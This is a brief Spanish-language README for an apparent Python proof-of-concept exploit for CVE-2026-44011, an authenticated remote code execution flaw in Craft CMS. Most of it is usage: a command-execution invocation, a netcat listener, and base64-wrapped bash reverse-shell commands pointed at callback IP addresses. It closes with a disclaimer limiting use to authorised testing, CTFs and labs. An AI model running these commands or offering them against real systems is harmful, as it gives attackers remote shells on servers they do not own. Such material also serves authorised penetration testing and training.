Prueba de concepto en Python para CVE-2026-44011 en Craft CMS, que explota la ejecución remota de código autenticada con ejecución de comandos y payloads de reverse shell envueltos en base64.
CVE-2026-44011-craft-rce-poc Uso
Comando único: bash
python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'
Reverse shell (bash envuelto en base64):
nc -lvnp 4444
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444
Si el objetivo no puede alcanzar tu callback, apúntalo explícitamente:
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509
Aviso legal
Solo para pruebas autorizadas, CTFs y entornos de laboratorio. No lo uses contra sistemas que no poseas o para los que no tengas permiso explícito de probar.